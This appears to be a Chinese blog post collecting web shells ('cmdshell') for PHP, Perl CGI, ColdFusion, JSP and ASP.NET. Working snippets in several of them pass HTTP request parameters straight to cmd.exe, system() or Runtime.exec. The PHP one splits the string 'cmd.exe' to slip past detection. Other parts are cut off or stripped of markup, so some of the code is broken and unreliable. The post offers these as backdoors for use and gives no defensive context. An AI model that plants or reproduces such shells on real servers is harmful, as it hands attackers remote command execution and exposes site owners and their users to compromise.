cmdshell集合

  • 发表于
  • 周边

共有:

2枚

下边是代码:

phpshell

---------------------------------------------------------------------------

exec ("cm"."d.e"."xe /c ".$_GET['wscript']."");
$stdout = $exec->StdOut();
$stroutput = $stdout->ReadAll();
echo $stroutput;
} elseif(key($_GET)=="proc_open"){
$descriptorspec = array(
 0 => array("pipe", "r"),
 1 => array("pipe", "w"),
 2 => array("pipe", "w")
);
$process = proc_open("C:\\Docume~1\\alluse~1\\Documents\\cmd.exe", $descriptorspec, $pipes);
if (is_resource($process)) {
fwrite($pipes[0], "".$_GET['proc_open']."\r\n");
fwrite($pipes[0], "exit\r\n");
fclose($pipes[0]);
while (!feof($pipes[1])) {
echo fgets($pipes[1], 1024);
}
fclose($pipes[1]);
while (!feof($pipes[2])) {
echo fgets($pipes[2], 1024);
}
fclose($pipes[2]);
proc_close($process);
}}
?>

--------------------------------------------------------------------------------------

perlshell cgi

#!/usr/bin/perl
read(STDIN,$POST,$ENV{'CONTENT_LENGTH'});
($key,$command)=split(/=/,$POST);
$command=~s/%([a-fA-f0-9][a-fA-f0-9])/pack("C",hex($1))/eg;
$command=~s/\+/ /;
$output=system "$command>a.txt";
$output=~s/\n/\/;
print "Content-Type: text/html\n\n";
print <

EOF open(OUTPUT,"a.txt")||die "cannot open $!"; @output=; print <@output EOF close OUTPUT; unlink ("a.txt"); exit;

--------------------------------------------------------------------------------------------------------------

cfm shell









#cmd#



--------------------------------------------------------------------------

jspshell

<%@ page import="java.io.*" %>
<%
try {
String cmd = request.getParameter("cmd");
Process child = Runtime.getRuntime().exec(cmd);
InputStream in = child.getInputStream();
int c;
while ((c = in.read()) != -1) {
out.print((char)c);
}
in.close();
try {
child.waitFor();
} catch (InterruptedException e) {
e.printStackTrace();
}
} catch (IOException e) {
System.err.println(e);
}
%>

----------------------------------------------------------------------------------------------

c# shell

<%@ Page Language="c#" validateRequest = "false" aspcompat = "true" %>






asp.net命令执行 by kyo

程序路径 :C:\Documents and Settings\All Users\Documents\cmd.exe
命令参数 :/c ver

---------------------------------------------------------------------------------------------------------

c# shell 2

<%@ Page Language="VB" validateRequest = "false" aspcompat = "true" Debug="true"%>


程序路径:
命令参数:

-----------------------------------------------------------------------------------------------------------------------

c# shell 3


<%@ Page Language="VB" validateRequest = "false" aspcompat = "true" %>


利用shell.application执行命令for asp.net

程序路径名:

参数: